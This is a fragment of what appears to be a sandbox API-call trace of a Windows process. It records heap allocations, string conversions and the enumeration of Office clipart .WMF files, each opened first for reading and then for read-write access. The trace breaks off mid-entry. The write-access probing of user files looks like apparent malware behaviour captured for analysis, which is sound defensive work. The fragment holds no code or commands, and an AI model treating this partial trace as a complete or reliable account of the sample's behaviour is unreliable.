[0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.120] AreFileApisANSI () returned 1 [0103.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0103.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 69 [0103.120] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x414)) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0103.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.121] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x876, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00136_.WMF", cAlternateFileName="")) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0103.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0103.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.121] AreFileApisANSI () returned 1 [0103.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0103.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.122] AreFileApisANSI () returned 1 [0103.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0103.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 69 [0103.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.122] GetFileType (hFile=0x368) returned 0x1 [0103.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0103.122] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.123] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.123] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.123] CloseHandle (hObject=0x368) returned 1 [0103.123] AreFileApisANSI () returned 1 [0103.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0103.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 69 [0103.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.123] GetFileType (hFile=0x368) returned 0x1 [0103.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0103.123] CloseHandle (hObject=0x368) returned 1 [0103.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.124] AreFileApisANSI () returned 1 [0103.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.124] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x876)) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00145_.WMF", cAlternateFileName="")) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] AreFileApisANSI () returned 1 [0103.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.124] AreFileApisANSI () returned 1 [0103.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.125] GetFileType (hFile=0x368) returned 0x1 [0103.125] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.125] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.125] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.125] CloseHandle (hObject=0x368) returned 1 [0103.125] AreFileApisANSI () returned 1 [0103.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0103.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 69 [0103.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.126] GetFileType (hFile=0x368) returned 0x1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0103.126] CloseHandle (hObject=0x368) returned 1 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.127] AreFileApisANSI () returned 1 [0103.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 69 [0103.127] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0103.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.127] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20ae, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BS00174_.WMF", cAlternateFileName="")) returned 1 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0103.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.128] InitOnceExecuteOnce 